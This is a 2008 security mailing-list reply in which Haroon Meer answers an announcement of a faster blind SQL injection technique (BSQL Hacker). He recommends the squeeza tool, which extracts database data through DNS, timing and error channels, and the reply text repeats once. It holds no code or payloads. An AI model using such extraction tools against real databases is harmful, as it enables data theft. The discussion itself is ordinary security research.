* On 19/08/2008, [at 14:38:55 +0100] Ferruh Mavituna [ferruh (at) mavituna (dot) com [email concealed]] seemed to say:
>This is a short whitepaper about a new way to exploit Blind SQL
>Injections. It's implemented in BSQL Hacker (
>http://labs.portcullis.co.uk/application/bsql-hacker/ ).
>
>It is possible gather information from a target server with a 66%
>reduction in the number of requests made of the server (compared to
>normal Blind SQL Injection), requiring two rather than six requests to
>retrieve each char.
if you like, you can also check out squeeza
[http://www.sensepost.com/research/squeeza/] and its associated
whitepaper
[http://www.sensepost.com/research/squeeza/dc-15-meer_and_slaviero-WP.pd
f]
squeeza allowed sql injection attacks to extract info via
DNS/Timing/Error Messages also, but its timing method extracted data one
bit at a time with retransmits / state control, effectively allowing for
full binary safe data transfer from the injectable .db
squeeza is written in ruby, and not as pretty as bsql-hacker, but in its
defense _did_ have an ascii art logo..
* On 19/08/2008, [at 14:38:55 +0100] Ferruh Mavituna [ferruh (at) mavituna (dot) com [email concealed]] seemed to say:
>This is a short whitepaper about a new way to exploit Blind SQL
>Injections. It's implemented in BSQL Hacker (
>http://labs.portcullis.co.uk/application/bsql-hacker/ ).
>
>It is possible gather information from a target server with a 66%
>reduction in the number of requests made of the server (compared to
>normal Blind SQL Injection), requiring two rather than six requests to
>retrieve each char.
if you like, you can also check out squeeza
[http://www.sensepost.com/research/squeeza/] and its associated
whitepaper
[http://www.sensepost.com/research/squeeza/dc-15-meer_and_slaviero-WP.pd
f]
squeeza allowed sql injection attacks to extract info via
DNS/Timing/Error Messages also, but its timing method extracted data one
bit at a time with retransmits / state control, effectively allowing for
full binary safe data transfer from the injectable .db
squeeza is written in ruby, and not as pretty as bsql-hacker, but in its
defense _did_ have an ascii art logo..
/mh
--
Haroon Meer, SensePost Information Security |
http://www.sensepost.com/blog/
PGP: http://www.sensepost.com/pgp/haroon.txt | Tel: +27 83786 6637
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
iEYEARECAAYFAkit0LsACgkQjc6KZkVo+waMHQCdEdJcfLPP1s476aobqG8ey7aP
MvYAn1LIPl28ZVO7eVII0a3JalgOODZz
=WC0P
-----END PGP SIGNATURE-----
[ reply ]